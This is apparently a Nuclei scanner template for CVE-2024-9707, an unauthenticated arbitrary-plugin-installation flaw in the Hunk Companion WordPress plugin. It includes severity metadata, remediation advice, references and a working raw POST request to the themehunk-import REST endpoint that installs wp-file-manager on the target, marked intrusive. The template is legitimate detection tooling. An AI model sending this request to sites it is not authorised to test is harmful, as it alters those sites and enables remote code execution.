id: CVE-2024-9707

info:
  name: Hunk Companion <= 1.8.4 - Arbitrary Plugin Installation
  author: DhiyaneshDK
  severity: critical
  description: |
    The Hunk Companion plugin for WordPress is vulnerable to unauthorized plugin installation/activation due to a missing capability check on the /wp-json/hc/v1/themehunk-import REST API endpoint in all versions up to, and including, 1.8.4. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.
  impact: |
    Unauthenticated attackers can install and activate arbitrary WordPress plugins, potentially achieving remote code execution if a vulnerable plugin is installed and activated on the target site.
  remediation: |
    Update Hunk Companion plugin to a version later than 1.8.4 that implements proper capability checks on the /wp-json/hc/v1/themehunk-import REST API endpoint.
  reference:
    - https://wordpress.org/plugins/hunk-companion/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9c101fca-037c-4bed-9dc7-baa021a8b59c?source=cve
    - https://github.com/iSee857/CVE-PoC/blob/main/WordPress_Hunk_Companion(CVE-2024-9707).py
    - https://github.com/RandomRobbieBF/CVE-2024-9707
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9707
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-9707
    cwe-id: CWE-862
    epss-score: 0.90276
    epss-percentile: 0.99613
    cpe: cpe:2.3:a:themehunk:hunk_companion:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: themehunk
    product: hunk_companion
    framework: wordpress
    fofa-query: body="/wp-content/plugins/hunk-companion/"
  tags: cve,cve2024,wp,wp-plugin,wordpress,hunk-companion,intrusive,vkev,vuln

http:
  - raw:
      - |
        POST /wp-json/hc/v1/themehunk-import HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"params": {"templateType": "free", "plugin": {"wp-file-manager": "Wp File Manager"}, "allPlugins": [{"wp-file-manager": "wp-file-manager/wp-file-manager.php"}], "builder": "gogo", "themeSlug": "gogo", "proThemePlugin": "wp-file-manager", "tmplFreePro": "plugin", "wpUrl": "https://downloads.wordpress.org/", "thUrl": "https://themehunk.com/wp/data/"}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"\"https:\\\/\\\/'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a826d814486e76a30c4ffa41534032a3d06b249a3638133bb6ed40ff83424d0d022100b35d853cf9c2a80ec418851d5219ccc235306e6dc1990e0f81c644ac3015888f:922c64590222798bb761d5b6d8e72950